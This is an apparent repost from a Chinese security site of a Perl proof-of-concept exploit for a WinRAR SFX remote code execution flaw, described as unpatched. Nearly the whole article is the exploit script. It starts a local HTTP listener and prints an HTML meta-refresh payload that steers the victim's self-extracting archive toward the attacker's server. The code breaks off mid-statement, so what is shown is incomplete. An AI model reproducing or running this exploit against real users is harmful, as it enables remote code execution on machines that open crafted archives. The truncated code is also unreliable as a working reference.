WinRAR Compression Tool Remote Code Execution Vulnerability PoC

颓废 2019-05-19 09:59:22
Summary

Unpatched and exploitable

PoC: Exploit Code

```perl
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# l0s4r.com

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));

my $port = 80;

print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET( Proto => 'tcp', LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die "Unable to create server socket";

# Server loop
while(my $client = $server->accept()) {
    my $client_info;
    while(<$client>) {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming {
    print "\n=== Incoming Request:\n";
    my $client = shift;
    print $c
```

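  • This article was published by 颓废 on 2019-05-19 09:59:22
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work):
                   WinRAR Compression Tool Remote Code Execution Vulnerability PoC http://cn-sec.com/archives/68379.html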
